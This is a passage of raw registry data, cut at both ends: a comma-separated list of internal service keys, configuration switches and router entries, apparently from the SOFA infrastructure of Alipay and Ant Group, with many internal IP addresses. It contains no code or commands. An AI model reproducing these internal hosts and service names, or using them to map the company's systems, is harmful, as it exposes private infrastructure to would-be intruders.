D#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.BpmsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.manager.UserTransferManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.malgo.common.facade.PromoAlgoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inspectprod.common.service.trigger.inspect.ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@sdaota#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_S_FILEBRIDGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.config.MobileCodeRouteWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.241.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.200.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.admin.SendConfigAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:schema-v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.influx.InfluxSettleRequestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_9_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.core.facade.CIGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.233.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.mng.WorkbenchMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotationQueryFacade:1.0:gold@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.home.api.MessageBoxServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_ALI_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscprod.facade.prophet.UserSeasonInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.platform.service.TransactionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:scenecube@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.127.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.databizcore.common.service.facade.credible.CredibleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.budgetproxy.BudgetQueryProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.SuspendClearingFileConfigDRM.targetCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.BrokerOpsSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.message.mng.service.MessageEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.BusinessAreaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aks.facade.cluster.detail.ClusterDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmpcore.common.service.facade.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotbsp.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.188.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.common.SystemParamServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.SpiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.aircard.product.PrepaidProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:captain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.DsdbCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.UniQueryConfService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditHzOrderEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSTPORTALMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dcepboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.CategoryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_HSF_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_BKCLOUDFUNDS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcacceptance.common.service.facade.CreditEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthyebtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.CreditPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.punishcenter.common.service.facade.PunishStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.unitestcenter.common.service.facade.api.NotifyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:dchainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custeval.common.service.facade.dataprocess.realtime.RdpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.core.shared.update.component.StrategyFlowUpdateComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_UNIFIEDLIMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.138.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.back.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adgdcore.ad.facade.AdServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.fc.common.lang.drm.AntBizLogCfgDrm.metricFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.common.service.facade.dsdc.SyncAdameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zappinfo.jiuzhou_remote_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.program.ProgramConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.productx.facade.ProductXRedeemPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentfusion.myhome.service.facade.AppDataFacade:1.0:insptmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.psEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.PlatformAppAuditFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpointprod.facade.api.mng.MpointSubBizTypeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adbizopt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.bankaccountflow.BankAccountFlowDataSourceFacade:1.0:gnfps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.isTrafficLightOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataservice.common.service.facade.ChargeBillQueryService:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rule.RuleModelManageService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.speech.topic.ReplyGwManagerNew:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.mobileconvoy.MobileConvoyInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.item.KbItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpdcore:name=com.alipay.fin.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.catalogPathControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.biz.shared.notify.ivr.IvrAlarmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfcenter.common.service.facade.ArInvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.200.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_GOVBIZCENTERDEPLOY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.tr.account.AccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:pcreditbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.ICBUMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.bankcard.facade.SignQueryServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchservbase.member.facade.prepaidcard.MemberPrepaidCardProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antforest.common.service.facade.EnergyTransferService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.LabelOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.resource.facade.OrganizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.isCloseSpringTwentyRaffle,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.activity.api.SceneActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mdata.auto.daointerface.ForexOrderReportDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finhadecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.80.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.core.service.emulator.dal.playback.qcenter.OeEmulatorPlaybackQcenterComponentRequestDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.productpkg.SmartAntPkgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiSidecarConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-basementdb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditamount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acmcscore.facade.ServiceRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:sffgroup-archimedes#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbatch.comm.service.facade.automation.BatchTuningService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.ctuInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.xts.dtap.service.DtapRecoveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityOperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.FinYebAssetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.facade.CouponFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.DiscussionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.drm.InsConfigDRMSevice.messageTestContent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.MobileQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.quota.spi.ResourceQuotaSpi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.antbuservice.AntPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthcare.common.service.facade.api.HealthCareMedicalTerminologyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequery.common.service.facade.TradeapRefundOrderQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fporgassetswap-all#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:smamlmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqamock.callback.MockCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fporgassetdecision-all#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gmcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.fpAssignedRefundConsultSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.openapi.whitelist.WhiteListOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.bindcard.UserBindCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@industrygw#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.zqueue.client.qaZQueue40#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","test:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.commonconfig.InstConfigInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustprocess_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvRetryInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antsecscheduler.common.service.facade.SchedulerManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.changerequirement.facade.spi.ChangePlanSpi:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmsccenter.common.service.facade.common.CommonNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.solution.pa.CustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinstdata.common.service.facade.service.orgconfig.PcinstOrgControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.hangLvProds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.module.InsIopSceneMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.brand.BrandMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.tmlife.TmLifeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.247.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.46.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mwalletmng.mwalletmng_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.176.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlequery.common.service.facade.withdraw.api.WithdrawHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.cloudauth.common.service.facade.oauth.OauthManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.test.facade.ZcbScheduleTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.SecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.risk.manager.RiskRuleManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelSqlStructQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipayment.service.facade.api.async.AsyncAuthCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchprod.common.service.facade.conf.MatchProductStockConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.levelpromo.LevelPromoPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.191.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.afwrobottwa:name=com.alipay.afwrobottwa.graygroup.chatHistoryWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.oyz.core.facade.api.model.ModelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cschannel.common.service.facade.rights.ExchangeHistoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.sdk.spi.service.LegoMetricQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.dds.api.ServiceQueryService:1.0:zhima@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.PromoDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthPolicyAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskgraph@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_mztest001#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasset.common.service.facade.stuff.api.AttachmentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CREDITUTCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.api.ShelfConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.WroteOffAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cooperservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthprod.facade.HealthGiftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:definpfprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.ParserTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.core.service.fund.repository.FinCommonLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypoint.api.AlipayPttransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.underwriting.ReexamineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.LoanServiceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapDataCleanDrm.delete,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditpledge.facade.PledgeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:acmantyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tnpmbuild@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.inssearch.api.